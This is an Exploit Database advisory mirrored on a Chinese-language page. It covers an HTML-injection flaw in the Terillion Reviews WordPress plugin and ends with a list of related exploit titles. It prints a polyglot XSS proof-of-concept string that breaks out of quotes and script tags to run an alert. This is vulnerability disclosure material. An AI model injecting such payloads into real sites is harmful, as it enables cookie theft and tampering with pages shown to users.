WordPress Plugin Terillion Reviews – Profile Id HTML Injection

Exploit Database
12 阅读

作者： Aditya Balapure

日期： 2013-03-08
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/38373/

source: https://www.securityfocus.com/bid/58415/info

The Terillion Reviews plugin for WordPress is prone to an HTML-injection vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content.

Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible. 

';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";
alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--
</SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>

last Exploits
WordPress Plugin Terillion Reviews – Profile Id HTML Injection的更多信息

WordPress Plugin Mimetic Books 0.2.13 – ‘Default Publisher ID field’ Stored Cross-Site Scripting (XSS)：
MyIT CRM – ‘index.php’ Multiple Cross-Site Scripting Vulnerabilities：
Balero CMS 0.7.2 – Multiple JS/HTML Injection Vulnerabilities：
IQrouter 3.3.1 Firmware – Remote Code Execution：
React software – Local File Inclusion：
Joomla! Component Classified – SQL Injection：
Monstra CMS 1.2.0 – ‘login’ SQL Injection：
Elite Bulletin Board 2.1.21 – Multiple SQL Injections：